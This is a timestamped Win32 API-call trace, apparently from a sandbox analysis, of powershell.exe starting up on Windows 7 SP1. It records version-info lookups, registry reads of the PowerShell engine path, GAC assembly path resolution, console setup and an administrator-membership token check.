	[0951.080] CoTaskMemAlloc (cb=0x44) returned 0x2e8210
	[0951.081] lstrcpyW (in: lpString1=0x2e8210, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0951.081] CoTaskMemFree (pv=0x2e8210) 
	[0951.081] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce3098, puLen=0x1ad9f0) returned 1
	[0951.081] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0951.081] CoTaskMemAlloc (cb=0x76) returned 0x30f2e0
	[0951.081] lstrcpyW (in: lpString1=0x30f2e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0951.081] CoTaskMemFree (pv=0x30f2e0) 
	[0951.081] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce3134, puLen=0x1ad9f0) returned 1
	[0951.081] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0951.081] CoTaskMemAlloc (cb=0x44) returned 0x2e8210
	[0951.081] lstrcpyW (in: lpString1=0x2e8210, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0951.081] CoTaskMemFree (pv=0x2e8210) 
	[0951.081] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce3198, puLen=0x1ad9f0) returned 1
	[0951.081] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0951.081] CoTaskMemAlloc (cb=0x58) returned 0x2c5680
	[0951.081] lstrcpyW (in: lpString1=0x2c5680, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0951.081] CoTaskMemFree (pv=0x2c5680) 
	[0951.081] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce3214, puLen=0x1ad9f0) returned 1
	[0951.081] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0951.081] CoTaskMemAlloc (cb=0x20) returned 0x36cf10
	[0951.081] lstrcpyW (in: lpString1=0x36cf10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0951.081] CoTaskMemFree (pv=0x36cf10) 
	[0951.081] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce2ebc, puLen=0x1ad9f0) returned 1
	[0951.081] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0951.081] CoTaskMemAlloc (cb=0x66) returned 0x36bc30
	[0951.081] lstrcpyW (in: lpString1=0x36bc30, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0951.081] CoTaskMemFree (pv=0x36bc30) 
	[0951.081] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x0, puLen=0x1ad9f0) returned 0
	[0951.082] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x0, puLen=0x1ad9f0) returned 0
	[0951.082] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x0, puLen=0x1ad9f0) returned 0
	[0951.082] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad9c8, puLen=0x1ad9c0 | out: lplpBuffer=0x1ad9c8*=0x2ce2e64, puLen=0x1ad9c0) returned 1
	[0951.082] CoTaskMemAlloc (cb=0x204) returned 0x311c60
	[0951.082] VerLanguageNameW (in: wLang=0x0, szLang=0x311c60, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0951.082] CoTaskMemFree (pv=0x311c60) 
	[0951.082] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\", lplpBuffer=0x1ada18, puLen=0x1ada10 | out: lplpBuffer=0x1ada18*=0x2ce2df0, puLen=0x1ada10) returned 1
	[0951.089] CoTaskMemAlloc (cb=0x104) returned 0x3597b0
	[0951.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3597b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.089] CoTaskMemFree (pv=0x3597b0) 
	[0951.090] CoTaskMemAlloc (cb=0x104) returned 0x3597b0
	[0951.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3597b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.090] CoTaskMemFree (pv=0x3597b0) 
	[0951.096] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad8e8 | out: phkResult=0x1ad8e8*=0x2e4) returned 0x0
	[0951.097] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad8d8 | out: phkResult=0x1ad8d8*=0x2e8) returned 0x0
	[0951.097] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad968 | out: phkResult=0x1ad968*=0x2ec) returned 0x0
	[0951.099] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad8ac, lpData=0x0, lpcbData=0x1ad8a8*=0x0 | out: lpType=0x1ad8ac*=0x1, lpData=0x0, lpcbData=0x1ad8a8*=0x56) returned 0x0
	[0951.100] CoTaskMemAlloc (cb=0x5a) returned 0x36bbc0
	[0951.100] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad87c, lpData=0x36bbc0, lpcbData=0x1ad878*=0x56 | out: lpType=0x1ad87c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad878*=0x56) returned 0x0
	[0951.100] CoTaskMemFree (pv=0x36bbc0) 
	[0954.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.088] CoTaskMemAlloc (cb=0x104) returned 0x3597b0
	[0954.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3597b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.088] CoTaskMemFree (pv=0x3597b0) 
	[0956.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0956.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0957.074] CoTaskMemAlloc (cb=0x104) returned 0x3598c0
	[0957.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3598c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.074] CoTaskMemFree (pv=0x3598c0) 
	[0957.075] CoTaskMemAlloc (cb=0x104) returned 0x3598c0
	[0957.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3598c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.075] CoTaskMemFree (pv=0x3598c0) 
	[0957.589] CoTaskMemAlloc (cb=0x104) returned 0x3598c0
	[0957.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3598c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.589] CoTaskMemFree (pv=0x3598c0) 
	[0957.589] CoTaskMemAlloc (cb=0x104) returned 0x3598c0
	[0957.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3598c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.589] CoTaskMemFree (pv=0x3598c0) 
	[0957.589] CoTaskMemAlloc (cb=0x104) returned 0x3598c0
	[0957.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3598c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.589] CoTaskMemFree (pv=0x3598c0) 
	[0959.054] CoTaskMemAlloc (cb=0x104) returned 0x3598c0
	[0959.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3598c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0959.054] CoTaskMemFree (pv=0x3598c0) 
	[0959.057] CoTaskMemAlloc (cb=0x104) returned 0x3598c0
	[0959.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3598c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0959.057] CoTaskMemFree (pv=0x3598c0) 
	[0963.477] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0963.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.477] CoTaskMemFree (pv=0x359ae0) 
	[0963.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0963.501] SetErrorMode (uMode=0x1) returned 0x1
	[0963.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ad840 | out: lpFileInformation=0x1ad840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0963.501] SetErrorMode (uMode=0x1) returned 0x1
	[0980.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0980.114] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0980.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0980.114] CoTaskMemFree (pv=0x359ae0) 
	[0980.117] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0980.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0980.117] CoTaskMemFree (pv=0x359ae0) 
	[0980.118] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0980.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0980.118] CoTaskMemFree (pv=0x359ae0) 
	[0980.121] CoCreateGuid (in: pguid=0x1adc08 | out: pguid=0x1adc08*(Data1=0x3c801bab, Data2=0xc5a9, Data3=0x4673, Data4=([0]=0x9f, [1]=0xab, [2]=0xd0, [3]=0x59, [4]=0xf4, [5]=0xb6, [6]=0x10, [7]=0x66))) returned 0x0
	[0980.124] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0980.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0980.124] CoTaskMemFree (pv=0x359ae0) 
	[0980.127] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0980.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0980.127] CoTaskMemFree (pv=0x359ae0) 
	[0980.129] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0980.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0980.129] CoTaskMemFree (pv=0x359ae0) 
	[0980.146] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0981.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ad8b0 | out: lpConsoleScreenBufferInfo=0x1ad8b0) returned 1
	[0981.460] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0981.460] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ad8b0 | out: lpConsoleScreenBufferInfo=0x1ad8b0) returned 1
	[0981.462] GetVersionExW (in: lpVersionInformation=0x1ad840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0981.465] GetCurrentProcess () returned 0xffffffffffffffff
	[0981.465] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ad8d8 | out: TokenHandle=0x1ad8d8*=0x300) returned 1
	[0981.470] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad7f8 | out: TokenInformation=0x0, ReturnLength=0x1ad7f8) returned 0
	[0981.471] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d7280
	[0981.471] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x2d7280, TokenInformationLength=0x4, ReturnLength=0x1ad7f8 | out: TokenInformation=0x2d7280, ReturnLength=0x1ad7f8) returned 1
	[0981.472] DuplicateTokenEx (in: hExistingToken=0x300, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ad958 | out: phNewToken=0x1ad958*=0x2fc) returned 1
	[0981.472] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad7f8 | out: TokenInformation=0x0, ReturnLength=0x1ad7f8) returned 0
	[0981.472] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d72b0
	[0981.472] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x2d72b0, TokenInformationLength=0x4, ReturnLength=0x1ad7f8 | out: TokenInformation=0x2d72b0, ReturnLength=0x1ad7f8) returned 1
	[0981.473] CheckTokenMembership (in: TokenHandle=0x2fc, SidToCheck=0x2dbdb70*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ad968 | out: IsMember=0x1ad968) returned 1
	[0981.474] CloseHandle (hObject=0x2fc) returned 1
	[0981.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.514] CoTaskMemAlloc (cb=0x804) returned 0x1b41e5a0
	[0981.515] GetConsoleTitleW (in: lpConsoleTitle=0x1b41e5a0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0981.515] CoTaskMemFree (pv=0x1b41e5a0) 
	[0981.772] CoTaskMemAlloc (cb=0x804) returned 0x1b4210d0
	[0981.772] GetConsoleTitleW (in: lpConsoleTitle=0x1b4210d0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0981.773] CoTaskMemFree (pv=0x1b4210d0) 
	[0981.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.775] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0981.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
